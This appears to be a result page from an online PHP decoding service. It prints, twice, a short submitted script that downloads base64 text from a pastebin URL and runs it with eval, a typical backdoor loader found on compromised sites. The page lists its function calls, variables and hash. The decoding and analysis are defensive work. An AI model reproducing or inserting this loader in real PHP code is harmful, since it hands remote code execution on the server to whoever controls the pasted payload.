Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $qwe = "http://pastebin.com/raw/pRHL4WWE"; $qwer = file_get_contents($qwe); ..

Decoded Output download

<?php  
  
$qwe = "http://pastebin.com/raw/pRHL4WWE";  
$qwer  = file_get_contents($qwe);   
eval("?>".(base64_decode($qwer)));  
  
?>

Did this file decode correctly?

Original Code

<?php 
 
$qwe = "http://pastebin.com/raw/pRHL4WWE"; 
$qwer  = file_get_contents($qwe);  
eval("?>".(base64_decode($qwer))); 
 
?>

Function Calls

base64_decode 1
file_get_contents 1

Variables

$qwe http://pastebin.com/raw/pRHL4WWE
$qwer

Stats

MD5 a8f70baf474be494caa65936ee59d88e
Eval Count 1
Decode Time 52 ms